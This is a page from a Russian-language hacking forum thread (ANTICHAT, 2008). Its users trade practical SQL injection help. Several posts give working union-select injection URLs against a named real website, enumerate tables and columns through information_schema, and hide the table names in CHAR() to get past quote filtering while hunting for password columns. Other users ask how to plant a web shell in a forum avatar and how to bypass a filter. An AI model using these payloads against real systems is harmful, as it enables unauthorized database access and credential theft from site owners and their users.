HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2201  
Старый 31.05.2008, 21:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Xszz  
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)
 
Ответить с цитированием

  #2202  
Старый 31.05.2008, 23:07
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_nam e,3,4,5,6,7,8,9+from+information_schema.tables+lim it+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите
 
Ответить с цитированием

  #2203  
Старый 31.05.2008, 23:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95, 117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,9+from+information_schema.columns+w here+table_name=CHAR(112,104,112,98,98,95,97,99,10 8,95,117,115,101,114,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,table_name+from+information_schema. columns+where+column_name+LIKE+CHAR(37,112,97,115, 37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!
 
Ответить с цитированием

  #2204  
Старый 31.05.2008, 23:45
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)
 
Ответить с цитированием

  #2205  
Старый 31.05.2008, 23:55
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Велемир
о да.. еще как работает sql tool 3

пс: у кого есть норм енкодер text в char()?

Последний раз редактировалось sabe; 01.06.2008 в 00:14..
 
Ответить с цитированием

  #2206  
Старый 31.05.2008, 23:56
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

http://www.webfuture.ru/igo/convert.php
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #2207  
Старый 01.06.2008, 00:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

спс)
 
Ответить с цитированием

  #2208  
Старый 01.06.2008, 15:04
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

ситуация такая:

Есть форум - вобла.
там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324

мне нужно в авик вписать шелл.

вопрос:
как мне анйти путь к моему авику? Или в этом случае аваторы в БД?
 
Ответить с цитированием

  #2209  
Старый 01.06.2008, 15:18
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

В булке аватары в бд если не ошибаюсь)
__________________
 
Ответить с цитированием

  #2210  
Старый 01.06.2008, 15:54
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Есть скуля. Версия 5. База данных и юзера выдернул.
Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...